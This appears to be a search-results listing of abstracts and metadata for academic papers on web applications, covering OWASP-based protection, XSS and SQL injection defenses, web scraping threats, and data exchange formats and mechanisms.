An OWASP Top Ten Driven Survey on Web Application Protection Methods

Mapping Intimacies ◽

10.36227/techrxiv.13265180.v1 ◽

2020 ◽

Author(s):

Ouissem Ben Fredj ◽

omar cheikhrouhou ◽

Moez Krichen ◽

Habib Hamam ◽

Abdelouahid Derhab

Keyword(s):

Web Application ◽

Data Exchange ◽

Web Applications ◽

Sensitive Data ◽

Web Vulnerabilities ◽

Broad Scale

Web applications (WAs) are constantly evolving and deployed at broad scale. However, they are exposed to a variety of attacks. The biggest challenge facing organizations is how to develop a WA that fulfills their requirements with respect to sensitive data exchange, E-commerce, and secure workflows. This paper identifies the most critical web vulnerabilities according to OWASP Top Ten, their corresponding attacks, and their countermeasures. The application of these countermeasures will guarantee the protection of the WAs against the most severe attacks and prevent several unknown exploits.

Download Full-text

An OWASP Top Ten Driven Survey on Web Application Protection Methods

10.36227/techrxiv.13265180 ◽

2020 ◽

Author(s):

Ouissem Ben Fredj ◽

omar cheikhrouhou ◽

Moez Krichen ◽

Habib Hamam ◽

Abdelouahid Derhab

Keyword(s):

Web Application ◽

Data Exchange ◽

Web Applications ◽

Sensitive Data ◽

Web Vulnerabilities ◽

Broad Scale

Download Full-text

XSS Vulnerability Assessment Procedure and Mitigation for Web Application

International Journal of Recent Technology and Engineering - 2 ◽

10.35940/ijrte.f9709.038620 ◽

2020 ◽

Vol 8 (6) ◽

pp. 5279-5281

Keyword(s):

Vulnerability Assessment ◽

Web Application ◽

Web Applications ◽

Assessment Procedure ◽

User Comments ◽

Web Vulnerabilities ◽

Client Side

CSS is one of the foremost routine vulnerabilities that affect many web applications. XSS attacks are essentially malicious injections (client-side) that are added to an internet page or app through user comments, form submissions, and so on. The most danger behind XSS is that it allows attackers to inject content into the online app. The injected content can modify how it's displayed, forcing the browser to execute the attacker’s code. Web vulnerabilities are developed for scanning whole webpage of internet sites. Vulnerability Assessment is that the process of identifying vulnerabilities in your application’s environment. Vulnerability is defined as a weakness or flaw within the system that permits an attacker or insider to access the system during a way they’re not authorized.

Download Full-text

Recent Trends in JSON Filters

International Journal of Scientific Research in Computer Science Engineering and Information Technology ◽

10.32628/cseit217116 ◽

2021 ◽

pp. 87-93

Author(s):

Atul Jain ◽

ShashiKant Gupta

Keyword(s):

Programming Language ◽

Web Application ◽

Data Exchange ◽

Web Applications ◽

Data Format ◽

Data Exchange Format ◽

Exchange Format ◽

Recent Trends ◽

Client Side ◽

Extract Information

JavaScript Object Notation is a text-based data exchange format for structuring data between a server and web application on the client-side. It is basically a data format, so it is not limited to Ajax-style web applications and can be used with API’s to exchange or store information. However, the whole data never to be used by the system or application, It needs some extract of a piece of requirement that may vary person to person and with the changing of time. The searching and filtration from the JSON string are very typical so most of the studies give only basics operation to query the data from the JSON object. The aim of this paper to find out all the methods with different technology to search and filter with JSON data. It explains the extensive results of previous research on the JSONiq Flwor expression and compares it with the json-query module of npm to extract information from JSON. This research has the intention of achieving the data from JSON with some advanced operators with the help of a prototype in json-query package of NodeJS. Thus, the data can be filtered out more efficiently and accurately without the need for any other programming language dependency. The main objective is to filter the JSON data the same as the SQL language query.

Download Full-text

A Comparison of Data Exchange Mechanisms for Real-Time Communication

International Journal of Rough Sets and Data Analysis ◽

10.4018/ijrsda.2017100105 ◽

2017 ◽

Vol 4 (4) ◽

pp. 66-81

Author(s):

Mohit Chawla ◽

Siba Mishra ◽

Kriti Singh ◽

Chiranjeev Kumar

Keyword(s):

Real Time ◽

Web Application ◽

Data Exchange ◽

Web Applications ◽

Relative Difference ◽

Exchange Mechanism ◽

Factors Affecting ◽

Client Server ◽

The Absolute

While web applications continue to employ traditional client-server model, most of the current applications demand real time bi-directional communication. In such setups, data exchanges between both the parties (client and server) are very frequent. Thus, performance of the network is subject to various factors decided by the choice of data exchange mechanism. This shows that the choice of data exchange mechanism is vital to performance of a web-application employing it. This paper compares various data exchange mechanisms with respect to factors affecting real time web applications. While the absolute values of benchmarking may vary with the systems, the relative difference between them can be used as a reference for selecting a mechanism for an application. Hence, this paper can be used as a reference to choose appropriate data exchange mechanism for the concerned application.

Download Full-text

Common web application attack types and security using ASP.NET

Computer Science and Information Systems ◽

10.2298/csis0602083j ◽

2006 ◽

Vol 3 (2) ◽

pp. 83-96 ◽

Cited By ~ 4

Author(s):

Bojan Jovicic ◽

Dejan Simic

Keyword(s):

Private Information ◽

Web Application ◽

Defense Mechanisms ◽

Web Applications ◽

Exception Handling ◽

Sensitive Data ◽

Web Application Security ◽

Direct Benefit ◽

Application Security ◽

Data Connection

Web applications security is one of the most daunting tasks today, because of security shift from lower levels of ISO OSI model to application level, and because of current situation in IT environment. ASP.NET offers powerful mechanisms to render these attacks futile, but it requires some knowledge of implementing Web application security. This paper focuses on attacks against Web applications, either to gain direct benefit by collecting private information or to disable target sites. It describes the two most common Web application attacks: SQL Injection and Cross Site Scripting, and is based on author?s perennial experience in Web application security. It explains how to use ASP.NET to provide Web applications security. There are some principles of strong Web application security which make up the part of defense mechanisms presented: executing with least privileged account, securing sensitive data (connection string) and proper exception handling (where the new approach is presented using ASP.NET mechanisms for centralized exception logging and presentation). These principles help raise the bar that attacker has to cross and consequently contribute to better security.

Download Full-text

The Emerging Threats of Web Scrapping to Web Applications Security and Their Defense Mechanism

Encyclopedia of Criminal Activities and the Deep Web ◽

10.4018/978-1-5225-9715-5.ch053 ◽

2020 ◽

pp. 788-809 ◽

Cited By ~ 2

Author(s):

Rizwan Ur Rahman ◽

Danish Wadhwa ◽

Aakash Bali ◽

Deepak Singh Tomar

Keyword(s):

Web Application ◽

Web Applications ◽

Defense Mechanism ◽

Web Content ◽

Web Data ◽

Sensitive Data ◽

Web Application Security ◽

Application Security ◽

Web Scraping

Web scraping is the technique exploited to robotically obtain particular information from web applications instead of manually copying it. The purpose of a web scraper is to search for certain class of information, dig out, and aggregate it into new database. More precisely, web scrapers are used to transform unstructured web data and store them in structured databases. It is a continuing threat to web applications that aims to steal sensitive data from a victim or from web applications. The key objective of this article is to examine to what extent web scraping can cause a threat to web application security. This article explores the classification of web scraping such as content scraping, web scraping, price scraping, and database scraping in general and presents the most widely used scraping tools such as Web Content Extractor, and Screen Scrapper. Consequently, the aim of this article is to give evaluation of vulnerabilities, threats of web scraping associated with web application applications, and effective measures to counter them.

Download Full-text

SWAP - A Framework for Ontology Support in Semantic Web Applications

Advances in Electronic Business, Volume 2 ◽

10.4018/978-1-59140-678-5.ch013 ◽

2011 ◽

pp. 309-319

Author(s):

Arijit Sengupta ◽

Henry Kim

Keyword(s):

Quality Management ◽

Web Services ◽

Semantic Web ◽

Web Service ◽

Web Application ◽

Data Exchange ◽

Web Applications ◽

High Data ◽

Testbed Implementation ◽

Xml Web

We present SWAP (Semantic Web application pyramid), a framework for incorporating ontologies in data-oriented semantic Web applications. We have implemented this framework with a measurement ontology for a quality management Web service. This quality management Web service is built on top of a set of XML Web services implementing agents representing quality management clients, quality management servers, and vendors. SWAP facilitates data exchange between these Web services with vendor data stored in databases, and the processing of the data using a combination of RuleML and SQL. The testbed implementation demonstrates the feasibility and scalability of the framework for any type of three-tier ontology-based semantic Web applications involving low to moderate data exchange. We discuss methods for improving this framework for high data exchange volumes as well. The primary contribution of this framework is in the component-based implementation of real-world semantic Web applications.

Download Full-text

THE FEATURES OF BUILDING WEB APPLICATIONS OF DATA SUPPORT OF AUTOMATIC CONTROL SYSTEMS

VESTNIK OF ASTRAKHAN STATE TECHNICAL UNIVERSITY SERIES MANAGEMENT COMPUTER SCIENCE AND INFORMATICS ◽

10.24143/2072-9502-2017-3-40-47 ◽

2017 ◽

pp. 40-47

Author(s):

Maksim Valer'evich Votinov

Keyword(s):

Web Application ◽

Data Exchange ◽

Web Applications ◽

Remote Access ◽

Mobile Platforms ◽

Protection Measures ◽

Sustainable Solutions ◽

Automatic Control Systems ◽

Network Intrusion ◽

The Web

The article focuses on development telecommunication functions providing remote control of technological processes, their visualizing, and executive mechanisms of different processing facilities (e.g. executive mechanisms of a small-size dryer created in Murmansk State Technical University in order to smoke and dry fish). The solution of the problem became possible due to the web application developed according to ASP (Active Server Pages) technology and used on top the web-server controlled by IIS (Internet Information Services), Microsoft. The advantage of the web-application is that it allows logging onto the automated control system irrespective of a small-size dryer location (i.e. working place is mobile), and technological process control is possible from any mobile platforms and operational systems. Due to using MS SQL Server Express it became possible to organize nonstop data exchange between automatic system of the small dryer and the end user (simultaneous work of several users is possible). The article presents the scheme of the user and web-application interface. Class of the project safety (III) has been determined, as well as corresponding basic protection measures, which provide implementing the user identification and authentication systems, antivirus and network intrusion systems. Project costs proved to be lower than the cost of software TRACE MODE Data Center (35.000 rubles instead of 58.000 rubles), which is found a truly sustainable solutions to realize a remote access to the automation facility. A growing number of users doesn’t affect the final cost of the project.

Download Full-text

Enhancing Security of Data Exchange through Block Chain Technology

International Journal of Engineering and Advanced Technology - Regular Issue ◽

10.35940/ijeat.d6826.049420 ◽

2020 ◽

Vol 9 (4) ◽

pp. 266-269

Keyword(s):

Cyber Security ◽

Information Exchange ◽

Web Application ◽

Data Exchange ◽

Web Applications ◽

Web Security ◽

The Internet ◽

Plain Text ◽

Web Attacks ◽

Data Transferring

Cyber security refers to a set of well-defined techniques used to protect the integrity of networks. It is used to protect vital data of customers and to restrict unauthorised access. In the era of E-Commerce, the demand for websites, web application increasing exponentially day by day. Web security is currently a significant issue for Internet enabled organization. Using websites, managing information through digital way. HTTP is a Hyper Text Transfer Protocol. It is used to transfer information over the internet. HTTP is most popular protocol widely used in web applications and allowed by internet firewalls, operating systems. HTTP is an unsecured information exchange protocol. Integrity is not there, so someone can easily alter with the content. In the internet data transferring over HTTP connection in plain text, this opening new loop hole to attackers to read every data sent over HTTP connection to web or webserver. Http is insecure as there is no encryption methods for it. So, it subjected towards the web attacks such as Man in the middle, cross site scripting, SQL Injection, click jacking, Broken authentication and session management attacks can occur. HTTP interaction with TCP is bad, causes the problems with performances and server scalability. In our proposed system, document which is used by more than one user and if there is in updation of the content user who is modifying the content of thier shared document must take their concern from other users. The process which is being used to authenticate the modifications of content of shared document is done with the help of shared key unless or until all users send the shared keys of each user the document will not be decrypted and hence further the changes in the document will not be possible.

Download Full-text

ANALYZING AND IMPROVING WEB APPLICATION QUALITY USING DESIGN PATTERNS

INTERNATIONAL JOURNAL OF COMPUTERS & TECHNOLOGY ◽

10.24297/ijct.v2i2b.2641 ◽

2012 ◽

Vol 2 (2) ◽

pp. 112-116

Author(s):

Shikha Bhatia ◽

Mr. Harshpreet Singh

Keyword(s):

Web Application ◽

Design Pattern ◽

Design Patterns ◽

Web Applications ◽

Past Research ◽

Software Systems ◽

Interactive Software ◽

Web Based ◽

Software Application ◽

Execution Speed

With the mounting demand of web applications, a number of issues allied to its quality have came in existence. In the meadow of web applications, it is very thorny to develop high quality web applications. A design pattern is a general repeatable solution to a generally stirring problem in software design. It should be noted that design pattern is not a finished product that can be directly transformed into source code. Rather design pattern is a depiction or template that describes how to find solution of a problem that can be used in many different situations. Past research has shown that design patterns greatly improved the execution speed of a software application. Design pattern are classified as creational design patterns, structural design pattern, behavioral design pattern, etc. MVC design pattern is very productive for architecting interactive software systems and web applications. This design pattern is partition-independent, because it is expressed in terms of an interactive application running in a single address space. We will design and analyze an algorithm by using MVC approach to improve the performance of web based application. The objective of our study will be to reduce one of the major object oriented features i.e. coupling between model and view segments of web based application. The implementation for the same will be done in by using .NET framework.

Download Full-text